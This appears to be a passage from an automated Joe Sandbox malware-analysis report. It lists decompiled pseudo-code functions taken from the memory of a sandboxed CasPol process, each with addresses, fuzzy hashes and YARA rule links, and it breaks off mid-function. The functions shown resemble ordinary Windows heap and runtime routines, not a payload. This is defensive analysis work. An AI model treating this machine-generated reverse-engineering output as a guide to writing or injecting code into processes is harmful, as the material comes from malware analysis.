                                                                Function 016F8F6A Relevance: .0, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 48%
                                                                			E016F8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x171d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E01647D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0166B640(E01669AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                0x016f8f6a
                                                                0x016f8f79
                                                                0x016f8f81
                                                                0x016f8f84
                                                                0x016f8f8b
                                                                0x016f8f91
                                                                0x016f8f94
                                                                0x016f8f9e
                                                                0x016f8fb0
                                                                0x016f8fa0
                                                                0x016f8fa9
                                                                0x016f8fa9
                                                                0x016f8fbb
                                                                0x016f8fbc
                                                                0x016f8fbe
                                                                0x016f8fc3
                                                                0x016f8fd6

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4ecb2e50ef795cf749ef74cfce95f23799f6a8b3f82ad4034fe2890cdc18cc3e
                                                                • Instruction ID: 9c9b1a18f407e754aa043f360ac58019b5bf050e5ae26e981b26a49b6dc59044
                                                                • Opcode Fuzzy Hash: 4ecb2e50ef795cf749ef74cfce95f23799f6a8b3f82ad4034fe2890cdc18cc3e
                                                                • Instruction Fuzzy Hash: CB014475A0120DEFDB00DFA8D945AAEB7F9EF18300F108459B905EB381DB34DA00CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016E1608 Relevance: .0, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 46%
                                                                			E016E1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x171d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E01647D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0166B640(E01669AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                                0x016e1608
                                                                0x016e1617
                                                                0x016e161d
                                                                0x016e1625
                                                                0x016e1628
                                                                0x016e162b
                                                                0x016e1636
                                                                0x016e1648
                                                                0x016e1638
                                                                0x016e1641
                                                                0x016e1641
                                                                0x016e1653
                                                                0x016e1654
                                                                0x016e1656
                                                                0x016e165b
                                                                0x016e166e

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d6dccae943e7fc40b428f8728a8492ce710dd4df27df58209b0bc85f9f6ddcee
                                                                • Instruction ID: d9db45dcd27b84a228909e588f8154a7164df9389abcbe452a0d1ec4d41b1566
                                                                • Opcode Fuzzy Hash: d6dccae943e7fc40b428f8728a8492ce710dd4df27df58209b0bc85f9f6ddcee
                                                                • Instruction Fuzzy Hash: A7F06271A01258EFDB14DFE8D815A6EB7F8FF14300F044159A905EB381EA349900CB54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0164C577 Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0164C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0164C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x16011cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E016F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                0x0164c577
                                                                0x0164c57d
                                                                0x0164c581
                                                                0x0164c5b5
                                                                0x0164c5b9
                                                                0x0164c5ce
                                                                0x0164c5ce
                                                                0x0164c5ca
                                                                0x00000000
                                                                0x0164c5ca
                                                                0x0164c5c4
                                                                0x0164c5c8
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0164c5ad
                                                                0x00000000
                                                                0x0164c5af

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 007c02d7eb93377054d2b8012de3979a4f9ca2fd71a1fbce1ac6346a1b0fc311
                                                                • Instruction ID: eec87b95991a5b0e11993340e87dc7b2a7181f11e8dcd452cb89df040c8cd627
                                                                • Opcode Fuzzy Hash: 007c02d7eb93377054d2b8012de3979a4f9ca2fd71a1fbce1ac6346a1b0fc311
                                                                • Instruction Fuzzy Hash: CCF0E9B29176909FE73EC71CCC04B2A7FD89B05770F4584ABD51587342D7A4D8A0C2D4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016E2073 Relevance: .0, Instructions: 32COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 94%
                                                                			E016E2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E016DFD22(__ecx);
				_t19 =  *0x171849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1718748; // 0x0
					if(__eflags <= 0) {
						E016E1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1718724 & 0x00000004;
							if(( *0x1718724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1718724; // 0x0
					return E016D8DF1(__ebx, 0xc0000374, 0x1715890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                0x016e2076
                                                                0x016e2078
                                                                0x016e207d
                                                                0x016e2083
                                                                0x016e20a4
                                                                0x016e20aa
                                                                0x016e20ac
                                                                0x016e20b7
                                                                0x016e20ba
                                                                0x016e20bc
                                                                0x016e20c9
                                                                0x016e20c9
                                                                0x016e20d0
                                                                0x016e20d2
                                                                0x00000000
                                                                0x016e20d2
                                                                0x016e20be
                                                                0x016e20c3
                                                                0x016e20c5
                                                                0x016e20c7
                                                                0x00000000
                                                                0x00000000
                                                                0x016e20c7
                                                                0x016e20bc
                                                                0x016e20d4
                                                                0x016e2085
                                                                0x016e2085
                                                                0x016e20a3
                                                                0x016e20a3

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 98e49969888d86969331e64b7ae314cb32f1408bceb5cce4cdb85ec89cff2671
                                                                • Instruction ID: 09949e99e175a342a0e3e8ec738a601382dbd1801c84bf7b5eaca82cfa333059
                                                                • Opcode Fuzzy Hash: 98e49969888d86969331e64b7ae314cb32f1408bceb5cce4cdb85ec89cff2671
                                                                • Instruction Fuzzy Hash: 04F0207B8171854BDF326B2C28292E12FEBD796120B09418DD8A017389CA388893CF29
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0166927A Relevance: .0, Instructions: 32COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 54%
                                                                			E0166927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0166FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E016692C6(_t11, _t14);
				}
				return _t11;
			}





                                                                0x01669295
                                                                0x01669299
                                                                0x0166929f
                                                                0x016692aa
                                                                0x016692ad
                                                                0x016692ae
                                                                0x016692af
                                                                0x016692b0
                                                                0x016692b4
                                                                0x016692bb
                                                                0x016692bb
                                                                0x016692c5

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                • Instruction ID: 6d92a4b4fe2edc1a4d9717746625a283c2da6b5c73eb6a12b4ce4b285ce1cb37
                                                                • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                • Instruction Fuzzy Hash: 83E02232340601ABE721AE0ADCC0F5737AEEF92724F00807CB9001E282CAF6DC0887A4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F8D34 Relevance: .0, Instructions: 32COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 43%
                                                                			E016F8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x171d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01647D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0166B640(E01669AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                0x016f8d34
                                                                0x016f8d43
                                                                0x016f8d4b
                                                                0x016f8d4e
                                                                0x016f8d52
                                                                0x016f8d5c
                                                                0x016f8d6e
                                                                0x016f8d5e
                                                                0x016f8d67
                                                                0x016f8d67
                                                                0x016f8d79
                                                                0x016f8d7a
                                                                0x016f8d7c
                                                                0x016f8d81
                                                                0x016f8d94

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 898727ed40c0435d26db27b143137c1510555a4096e462eb05509c9a975cd8af
                                                                • Instruction ID: 1da06467a0a10841cb2690a7e665ab79fe9e2f61eeaeed535a15064a60f20900
                                                                • Opcode Fuzzy Hash: 898727ed40c0435d26db27b143137c1510555a4096e462eb05509c9a975cd8af
                                                                • Instruction Fuzzy Hash: 6AF0B471A046089FDB14EFB8D845A6EB7B8EF14300F10809DE905EB380DA34D900CB54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F8B58 Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 36%
                                                                			E016F8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x171d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01647D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0166B640(E01669AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                0x016f8b67
                                                                0x016f8b6f
                                                                0x016f8b72
                                                                0x016f8b7d
                                                                0x016f8b8f
                                                                0x016f8b7f
                                                                0x016f8b88
                                                                0x016f8b88
                                                                0x016f8b9a
                                                                0x016f8b9b
                                                                0x016f8b9d
                                                                0x016f8ba2
                                                                0x016f8bb5

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 80608c0f48cdf22f1f78df6636ade37e59578234115a8aa5b048ee406fed555f
                                                                • Instruction ID: add96e6a4250ca9da2b98666e5d3d3b743c8591dfab3b3962ab2c7ec3a7612cc
                                                                • Opcode Fuzzy Hash: 80608c0f48cdf22f1f78df6636ade37e59578234115a8aa5b048ee406fed555f
                                                                • Instruction Fuzzy Hash: 4CF082B1A1425DAFDB10EBA8DD06E6EB7B8EF14300F04049DBA05DB380EB34D900C798
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0164746D Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 88%
                                                                			E0164746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0163EB70(__ecx, 0x17179a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E016695D0();
							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                0x0164746d
                                                                0x0164746d
                                                                0x0164746d
                                                                0x01647471
                                                                0x01647488
                                                                0x0168f92d
                                                                0x0164748e
                                                                0x01647491
                                                                0x01647495
                                                                0x0168f937
                                                                0x0168f93a
                                                                0x0168f94e
                                                                0x0168f953
                                                                0x0168f956
                                                                0x0168f956
                                                                0x01647495
                                                                0x00000000
                                                                0x01647488
                                                                0x01647473
                                                                0x01647478
                                                                0x0164747d
                                                                0x01647481
                                                                0x00000000
                                                                0x01647481
                                                                0x0164747d
                                                                0x0164747a
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7df576a58911947865fcfcac9e5117c38b9f942dc914450680fa4942f2d3b061
                                                                • Instruction ID: b48a5b1851cc34e28269a4c01618e68fb16d6506fc5589276d0199b8ef4461b3
                                                                • Opcode Fuzzy Hash: 7df576a58911947865fcfcac9e5117c38b9f942dc914450680fa4942f2d3b061
                                                                • Instruction Fuzzy Hash: D5F02738902145EBDF12FB7CCC40F79BFB2AF04314F040669D991AB2A1E725D802C799
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F8CD6 Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 36%
                                                                			E016F8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x171d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E01647D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0166B640(E01669AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                0x016f8ce5
                                                                0x016f8ced
                                                                0x016f8cf0
                                                                0x016f8cfb
                                                                0x016f8d0d
                                                                0x016f8cfd
                                                                0x016f8d06
                                                                0x016f8d06
                                                                0x016f8d18
                                                                0x016f8d19
                                                                0x016f8d1b
                                                                0x016f8d20
                                                                0x016f8d33

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 768caa150081dce4b1b3cce8ad811eb302868daa06862789d5d29560c155efef
                                                                • Instruction ID: 21e5d3d1433cba7d64e44c81dcb6460cb5d0ae8d14768cd813102dc0733d7fa9
                                                                • Opcode Fuzzy Hash: 768caa150081dce4b1b3cce8ad811eb302868daa06862789d5d29560c155efef
                                                                • Instruction Fuzzy Hash: F6F08271A04659AFDB04DBA8ED45E6E77B8EF18300F10419DE915EB3C0EA34D900C758
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01624F2E Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E01624F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E016F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0164C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1601030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                0x01624f2e
                                                                0x01624f34
                                                                0x01624f38
                                                                0x01680b85
                                                                0x01680b85
                                                                0x01680b89
                                                                0x01680b9a
                                                                0x01680b9a
                                                                0x01680b9f
                                                                0x00000000
                                                                0x01680b9f
                                                                0x01680b94
                                                                0x01680b98
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01680b98
                                                                0x01624f3e
                                                                0x01624f48
                                                                0x00000000
                                                                0x01624f6e
                                                                0x00000000
                                                                0x01624f70

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ead9d0e162a37e88ad5760c705c50a0003848e184b0f7eb2e125b052cdbc2894
                                                                • Instruction ID: 9b348ddeecfcc8c8c5003d6256b3668eb79751efdd4cd8838f13ee6d5ea386bf
                                                                • Opcode Fuzzy Hash: ead9d0e162a37e88ad5760c705c50a0003848e184b0f7eb2e125b052cdbc2894
                                                                • Instruction Fuzzy Hash: F7F0E2325666968FE772EF1CCD44F22B7D8AB107B8F054A78E40587B22CB25EC48C680
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165A44B Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0165A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1717b9c; // 0x0
				_t15 = __ecx;
				_t16 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0166FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                0x0165a44b
                                                                0x0165a453
                                                                0x0165a472
                                                                0x0165a476
                                                                0x00000000
                                                                0x0165a493
                                                                0x0165a47a
                                                                0x0165a47f
                                                                0x0165a486
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dbc13735e4c0d254f67d773521c3aba6e6710b5087277fb31adf08ef309b573a
                                                                • Instruction ID: b9e59a3e3a808f83cdcc13b3cdec3426e68d2fee112b5abf17b44c96f1f468a6
                                                                • Opcode Fuzzy Hash: dbc13735e4c0d254f67d773521c3aba6e6710b5087277fb31adf08ef309b573a
                                                                • Instruction Fuzzy Hash: 0EE09272A02421ABD3215A98BD00F66779EEBE4A51F094139FA04C7214DA28DD02C7E0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0162F358 Relevance: .0, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 79%
                                                                			E0162F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0165F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01644620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                0x0162f35d
                                                                0x0162f361
                                                                0x0162f367
                                                                0x0162f372
                                                                0x0162f38c
                                                                0x0162f38c
                                                                0x0162f394

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                • Instruction ID: ccd3bde20cd95943586e7614235c30b3fb8d2cddba541b2c1dcd78634f747210
                                                                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                • Instruction Fuzzy Hash: D2E0D832A40128FBDB21A6D99D05F9ABFBDDB54AA0F0001D5FA04D7150D9609D00C6D0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0163FF60 Relevance: .0, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0163FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x16011a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E016F88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E01640050(_t14);
				}
			}










                                                                0x0163ff66
                                                                0x0163ff6b
                                                                0x00000000
                                                                0x0163ff8f
                                                                0x00000000
                                                                0x0163ff8f

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0f5b92ad4fed7ff67063e8add9c454c48e3b529e7b7f4dfd5cafcad4ef6d0a0e
                                                                • Instruction ID: 214a20988eed26f472c4b9a18597631b5453d5fbc2f5185aad67f92bb3e4a4a7
                                                                • Opcode Fuzzy Hash: 0f5b92ad4fed7ff67063e8add9c454c48e3b529e7b7f4dfd5cafcad4ef6d0a0e
                                                                • Instruction Fuzzy Hash: D7E0DFB0A052049FD73ADF5DDC40F273B9C9B92721F1A80DDE8084B202CB21D881C28B
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016B41E8 Relevance: .0, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 82%
                                                                			E016B41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x17008f0);
				_t5 = E0167D08C(__ebx, __edi, __esi);
				if( *0x17187ec == 0) {
					E0163EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x17187ec == 0) {
						 *0x17187f0 = 0x17187ec;
						 *0x17187ec = 0x17187ec;
						 *0x17187e8 = 0x17187e4;
						 *0x17187e4 = 0x17187e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L016B4248();
				}
				return E0167D0D1(_t5);
			}





                                                                0x016b41e8
                                                                0x016b41ea
                                                                0x016b41ef
                                                                0x016b41fb
                                                                0x016b4206
                                                                0x016b420b
                                                                0x016b4216
                                                                0x016b421d
                                                                0x016b4222
                                                                0x016b422c
                                                                0x016b4231
                                                                0x016b4231
                                                                0x016b4236
                                                                0x016b423d
                                                                0x016b423d
                                                                0x016b4247

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a09ab9b5fa1603bcc65f40b01569a833c97e5fd74e1fb12139d72fa9621c8773
                                                                • Instruction ID: c293523084bf6cdd0cf341220aef39228a10998bacc62cb42ade393e2dd04a62
                                                                • Opcode Fuzzy Hash: a09ab9b5fa1603bcc65f40b01569a833c97e5fd74e1fb12139d72fa9621c8773
                                                                • Instruction Fuzzy Hash: 3CF01E78860701CECBB2EFEDA94075876A5FB94361F10C12B9101A728ACB3445A1DF1A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016DD380 Relevance: .0, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E016DD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0162E8B0(__ecx, _a4, 0xfff);
